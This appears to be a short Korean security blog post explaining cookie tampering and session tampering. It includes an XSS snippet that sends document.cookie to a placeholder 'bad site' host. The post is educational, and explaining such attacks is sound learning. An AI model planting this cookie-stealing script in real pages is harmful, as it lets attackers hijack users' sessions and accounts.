1.쿠키 위변조(Cookie Tampering)
사용자가 웹 브라우저에 저장된 쿠키 값을 변경하거나 악의적으로 수정하는 공격이다.
세션 ID나 인증 토큰을 바꾸거나, 사용자 데이터에 임의 값을 삽입하는 식으로 조작할 수 있다.
개발자 도구로 username 토큰을 admin으로 설정하는 위변조
이런식으로 XSS로 쿠키를 탈취해갈수도있다..
<script>
new Image().src = "나쁜사이트" + document.cookie;
</script>
2.세션 위변조(Session Tampering)
사용자가 웹 애플리케이션의 세션 데이터를 조작하여, 사용자의 인증 정보나 상태를 악의적으로 변경하는 공격
세션아이디가 탈취당하면 사용자의 계정이 그대로 탈취당할수있다..
'Computer Science > Security' 카테고리의 다른 글
| [보안] Same Origin Policy (SOP) (0) | 2025.01.18 |
|---|---|
| [보안] 프록시 (Proxy), VPN (Virtual Private Network) (0) | 2024.06.29 |
| [보안] 방화벽(firewall) (0) | 2024.06.29 |
